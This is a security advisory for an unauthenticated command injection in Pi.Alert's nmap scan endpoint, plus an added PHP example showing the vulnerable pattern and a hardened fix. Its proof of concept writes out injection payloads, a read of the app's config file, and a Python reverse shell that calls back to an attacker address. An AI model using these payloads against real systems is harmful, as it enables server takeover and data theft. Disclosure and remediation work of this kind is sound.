
Remote Code Execution via OS Command Injection CVE-2022-48252

High
jokob-sk published GHSA-vhg3-f6gv-j89r Dec 23, 2022

Package

nmap_scan.php (Pi.Alert)

Affected versions

1.0

Patched versions

v22.12.20

Description

Summary

An OS Command injection vulnerability allows any unauthenticated user to execute arbitrary code on the server.

Details

The affected code can be found here:
https://github.com/jokob-sk/Pi.Alert/blob/main/front/php/server/nmap_scan.php
The corresponding leiweibau fork is affected as well.
Here is the CWE with more information on how the vulnerability works and can be fixed.
https://cwe.mitre.org/data/definitions/78.html

Some other helpful links:
https://cheatsheetseries.owasp.org/cheatsheets/OS_Command_Injection_Defense_Cheat_Sheet.html
https://owasp.org/www-project-web-security-testing-guide/latest/4-Web_Application_Security_Testing/07-Input_Validation_Testing/12-Testing_for_Command_Injection
https://owasp.org/www-community/attacks/Command_Injection

PoC

Using the default configuration, click on any device and then navigate to the nmap tab. Click on one of the nmap buttons and intercept the request via Burp Proxy. Modify the request by adding a semi-colon and then whatever other command you want to run after the scan=.

scan=192.168.1.5&mode=fast

to

scan=;whoami&mode=fast

It will come back as www-data.

Another useful command is:

scan=;cat ../../../config/pialert.conf&mode=fast

Reverse shell via python (change the ip and port to match attacker machine):

scan=;python -c 'import socket,subprocess;s=socket.socket(socket.AF_INET,socket.SOCK_STREAM);s.connect(("192.168.1.63",4444));subprocess.call(["/bin/sh","-i"],stdin=s.fileno(),stdout=s.fileno(),stderr=s.fileno())'&mode=fast

Video of the POC (unlisted video):
https://youtu.be/BR43Af5iykE

The same request can also result in XSS, but that is of little concern here since this is an unauthenticated, internal-only application.
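To make the Details and PoC sections concrete from the defender's side, the following is an added example written for this advisory; it is not Pi.Alert's actual nmap_scan.php and not the fix shipped in v22.12.20. It contrasts the injection pattern described above (user input concatenated into a shell command line) with a hardened handler that validates the target, maps the mode to a fixed option table, and starts nmap without a shell. The parameter names scan and mode come from the PoC; the function names, the mode-to-flag table and the use of proc_open() with an argument array (PHP 7.4 or later) are assumptions of this example.

```php
<?php
// Added example for this advisory: NOT the project's nmap_scan.php and not
// the v22.12.20 fix. Parameter names "scan" and "mode" come from the PoC;
// function names and the mode table are assumptions of this example.
declare(strict_types=1);

// Vulnerable pattern (contrast only). User input is concatenated into a
// shell command line, so a ";" in "scan" ends the nmap command and the rest
// of the value runs as a second command under the web server's account.
function buildCommandUnsafe(string $scan, string $mode): string
{
    $flags = ($mode === 'fast') ? '-F' : '';
    return "nmap $flags $scan";
}

// Hardened path, step 1: accept only values that look like a scan target.
// Validation rejects rather than "cleans": an IPv4/IPv6 literal or an
// RFC 1123 hostname is allowed, everything else yields null.
function validateTarget(string $scan): ?string
{
    $scan = trim($scan);
    if (filter_var($scan, FILTER_VALIDATE_IP) !== false) {
        return $scan;
    }
    $label = '[a-z0-9](?:[a-z0-9-]{0,61}[a-z0-9])?';
    if (strlen($scan) <= 253 && preg_match("/^(?:$label\\.)*$label$/i", $scan) === 1) {
        return $scan;
    }
    return null;
}

// Step 2: "mode" never reaches the shell; it selects from a fixed table.
const SCAN_MODES = [
    'fast'   => ['-F'],
    'normal' => [],
];

// Step 3: build an argv array. With proc_open() taking an array (PHP >= 7.4)
// no shell is involved at all, so metacharacters carry no meaning.
function buildCommandSafe(string $scan, string $mode): ?array
{
    $target = validateTarget($scan);
    if ($target === null || !array_key_exists($mode, SCAN_MODES)) {
        return null;
    }
    return array_merge(['nmap'], SCAN_MODES[$mode], [$target]);
}

function runScan(string $scan, string $mode): string
{
    $argv = buildCommandSafe($scan, $mode);
    if ($argv === null) {
        http_response_code(400);
        return 'invalid scan target or mode';
    }
    $spec = [1 => ['pipe', 'w'], 2 => ['pipe', 'w']];
    $proc = proc_open($argv, $spec, $pipes);
    if (!is_resource($proc)) {
        return 'failed to start scan';
    }
    $out = stream_get_contents($pipes[1]);
    fclose($pipes[1]);
    fclose($pipes[2]);
    proc_close($proc);
    // Encode before echoing into HTML so scan output cannot become XSS.
    return htmlspecialchars($out, ENT_QUOTES, 'UTF-8');
}

// If a shell really is required (older PHP), wrap every argument instead:
//   $cmd = implode(' ', array_map('escapeshellarg', $argv));

// CLI self-check over the inputs from the PoC above (no nmap is executed).
if (PHP_SAPI === 'cli') {
    foreach ([['192.168.1.5', 'fast'], [';whoami', 'fast'], ['192.168.1.5', 'slow']] as [$s, $m]) {
        $argv = buildCommandSafe($s, $m);
        printf("scan=%s&mode=%s -> %s\n", $s, $m, $argv === null ? 'rejected' : implode(' ', $argv));
    }
}
```

Run with `php example.php` to see the PoC's legitimate request accepted and the `;whoami` value rejected before any process is started. The design point is that escaping is the fallback, not the primary control: a strict allowlist on the target and a lookup table for the mode leave nothing for the shell to interpret, and using proc_open() with an array removes the shell from the path entirely.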

Impact

An attacker with access to the Pi.Alert web UI would be able to run code on the server.

Severity

High

CVE ID

No known CVE

Weaknesses

Credits